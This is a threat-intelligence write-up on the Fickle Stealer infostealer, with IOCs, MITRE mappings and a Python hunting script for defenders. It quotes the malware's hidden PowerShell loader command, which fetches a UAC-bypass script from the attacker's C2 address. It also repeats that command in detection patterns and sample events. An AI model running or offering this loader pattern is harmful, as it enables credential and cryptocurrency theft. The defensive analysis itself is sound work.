New Malware Exploits Invalid Certificate to Breach Systems

Fickle Stealer is a newly identified Rust-based information stealer that spreads via phishing, drive-by downloads, exploit kits, and malicious attachments while masquerading as legitimate software such as GitHub Desktop using an invalid digital signature. It uses PowerShell-based UAC bypass, custom packers and obfuscation, and communicates with a command-and-control host to steal browser credentials, system data, and cryptocurrency wallet details. #FickleStealer #GitHubDesktop

Keypoints

  • Fickle Stealer is written in Rust and designed to harvest sensitive data from infected systems.
  • It is distributed through phishing attachments, drive-by downloads, exploit kits, LNK files, and fake installers.
  • The threat uses PowerShell scripts (e.g., bypassu.ps1, engine.ps1) to bypass User Account Control (UAC) and execute payloads.
  • Capabilities include stealing browser-stored credentials, cryptocurrency wallet details, screenshots, and arbitrary files.
  • Fickle employs custom packers and anti-analysis techniques to evade detection and sandboxing.
  • It masquerades as GitHub Desktop with an invalid digital signature to appear legitimate and facilitate execution.
  • Payloads contact a C2 at 185[.]213[.]208[.]245 and multiple malicious binaries and scripts have documented hashes.

MITRE Techniques

  • [T1071] Command and Control – Maintains communication with remote servers to receive instructions and exfiltrate data (‘185[.]213[.]208[.]245’ and ‘185[.]213[.]208[.]245bypassu.ps1’).
  • [T1203] Execution – Exploits vulnerabilities and uses command execution to run payloads (‘cmd /c powershell.exe -nop -win hidden -ExecutionPolicy Bypass -File 185[.]213[.]208[.]245bypassu.ps1’).
  • [T1003] Credential Dumping – Collects credentials and stored browser data from compromised hosts (‘steals credentials from web browsers and applications’).
  • [T1547] Persistence – Establishes persistence by creating scheduled tasks and using injected binaries to ensure continued execution (‘sets up a new task to execute engine.ps1’).
  • [T1027] Obfuscated Files or Information – Uses a custom packer and obfuscated strings to hinder static analysis (‘custom packer to obfuscate its malicious code’).
  • [T1041] Exfiltration Over C2 Channel – Transmits harvested data to attacker-controlled endpoints and a Telegram bot (‘regularly transmit details about the victim … to a Telegram bot managed by the attacker’).

Indicators of Compromise

  • [Domain/URL] C2 and payload hosting – hxxp://185[.]213[.]208[.]245, 185[.]213[.]208[.]245bypassu.ps1 (malicious command-and-control and script host).
  • [File Hashes] Sample payloads and scripts – SHA256: 4c930e2ed4f44cacfe5a5938c446f0973a31b0969d399dacbf6c2625aa72b812, MD5: C3C7DAA897ABEB907AEB13250E882FE5 (associated with the GitHub Desktop masquerade), and other reported hashes for payloads and scripts (multiple additional hashes listed in the report).
  • [File Names] Masquerade and payloads – “GitHub Desktop” (spoofed installer), Dctooux.exe and Bootstrapper.exe (examples of dropped/executing binaries).
  • [Script Names] PowerShell scripts used in attack chain – bypassu.ps1, u.ps1, engine.ps1 (UAC bypass, persistence, and injection logic).
  • [Certificate/Digital Signature] Spoofed signer details – Signed by “GitHub, Inc.” and countersigned by “Microsoft Public RSA Time Stamping Authority” (invalid/forged signature used to appear legitimate).

Fickle Stealer is a Rust-built information stealer that surfaced in May 2024 and has been observed delivered through multiple vectors including phishing documents, malicious LNK files, drive-by downloads, and exploit kits. Operators mask the malware as legitimate software—most notably a fake “GitHub Desktop” installer with an invalid signature—to increase user trust and drive execution on victim machines.

Technically, the family chains PowerShell scripts together to bypass User Account Control (UAC) and deploy its payloads. The command line captured during analysis shows the loader invoking PowerShell with policy-bypass and hidden-window flags to run a remote script (for example, “cmd /c powershell.exe -nop -win hidden -ExecutionPolicy Bypass -File 185[.]213[.]208[.]245bypassu.ps1”). engine.ps1 and inject.ps1 handle the scanning, injection, and execution flows, storing encoded paths in prepares.dat so that already-injected processes are not injected again.

Evasion and persistence are central to Fickle’s design: it uses a custom packer and obfuscated strings to frustrate static analysis, performs anti-sandbox checks, and creates scheduled tasks to maintain access. The stealer harvests browser credentials, system information, and crypto wallet data; it can send the collected metadata to a Telegram bot or an attacker-controlled C2, and can then optionally self-delete after displaying fake error messages.

Defenders should hunt for the listed domains, script names, and hashes; verify suspicious digital signatures with tools such as sigcheck; and monitor for PowerShell invocations that combine -ExecutionPolicy Bypass with hidden-window flags. Detection signatures (for example, PS/Agent.jk and Generic Obfuscated.g) appear in vendor telemetry, but hunting on the provided IOCs and behavioral indicators remains important.
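The loader command line described above and the hunting guidance in this paragraph, turned into detection logic as an added example that is not from the Trellix report: a small Python scorer run over constructed process-creation events. The indicators (the C2 address, the script names, and the -nop / -win hidden / -ExecutionPolicy Bypass flags) come from the report; the Sysmon-style field names, the sample events, and the alert thresholds are assumptions made for this example.

```python
"""Hunt for the Fickle Stealer loader pattern in process-creation telemetry.

Added example (not the report's own tooling).  It scores command lines for the
indicators the write-up names: PowerShell run with -ExecutionPolicy Bypass, a
hidden window, -nop, the reported C2 address and the named scripts.  The
sample events are constructed; the field names mimic Sysmon Event ID 1 but
are an assumption, not a specific product's schema.
"""
import re

# Atomic indicators taken from the report, kept in the published defanged form.
# A production hunt would load these from a threat-intel feed instead.
C2_ADDRESS = "185[.]213[.]208[.]245"
SCRIPT_NAMES = ["bypassu.ps1", "u.ps1", "engine.ps1", "inject.ps1"]

# Behavioural indicators.  PowerShell accepts unambiguous prefixes of its
# parameter names, so the short forms (-ep, -win, -nop) are matched as well.
BEHAVIOUR_PATTERNS = {
    "powershell": re.compile(r"\bpowershell(?:\.exe)?\b", re.I),
    "execution_policy_bypass": re.compile(r"-(?:ExecutionPolicy|ep|ex|exec)\s+bypass", re.I),
    "hidden_window": re.compile(r"-(?:WindowStyle|win|w)\s+hidden", re.I),
    "no_profile": re.compile(r"-(?:NoProfile|nop)\b", re.I),
}


def refang(indicator: str) -> str:
    """Turn the published '[.]' form back into what a real log line contains."""
    return indicator.replace("[.]", ".")


def analyze(cmdline: str) -> dict:
    """Return the indicators present in one command line plus a verdict."""
    hits = [name for name, pat in BEHAVIOUR_PATTERNS.items() if pat.search(cmdline)]

    if refang(C2_ADDRESS) in cmdline:
        hits.append("c2_address")
    for script in SCRIPT_NAMES:
        # Letter lookbehind so 'u.ps1' does not also fire on 'bypassu.ps1',
        # while a digit or path separator before the name still matches.
        if re.search(r"(?<![A-Za-z])" + re.escape(script) + r"\b", cmdline, re.I):
            hits.append("script:" + script)

    ioc_hit = any(h == "c2_address" or h.startswith("script:") for h in hits)
    # The report's loader pairs policy bypass with a hidden window; requiring
    # both keeps routine '-File backup.ps1' admin scripts below threshold.
    pair_hit = "execution_policy_bypass" in hits and "hidden_window" in hits
    behaviour_only = [h for h in hits if h not in ("powershell",)]

    if ioc_hit or pair_hit:
        verdict = "alert"
    elif behaviour_only:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": hits}


def hunt(events: list) -> list:
    """Score a batch of process-creation events; returns one result per event."""
    return [{"image": e["image"], **analyze(e["cmdline"])} for e in events]


# Constructed sample events.  The first reproduces the report's loader command
# line with the address refanged, as it would appear in real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c powershell.exe -nop -win hidden -ExecutionPolicy Bypass "
                "-File " + refang(C2_ADDRESS) + "bypassu.ps1"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -WindowStyle Hidden -ep bypass -File C:\Users\Public\engine.ps1"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -File C:\Tasks\inventory.ps1"},
    {"image": r"C:\Program Files\GitHub Desktop\GitHubDesktop.exe",
     "cmdline": "GitHubDesktop.exe"},
]

if __name__ == "__main__":
    for result in hunt(SAMPLE_EVENTS):
        print(f"{result['verdict']:<10} {result['image']}  {result['indicators']}")
```

The scorer separates atomic IOCs (which alert on their own, but age quickly) from the behavioural pair that the report's loader exhibits, so the hunt still fires after the operators rotate the C2 address or rename the scripts.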

Read more: https://www.trellix.com/blogs/research/new-stealer-uses-invalid-cert-to-compromise-systems/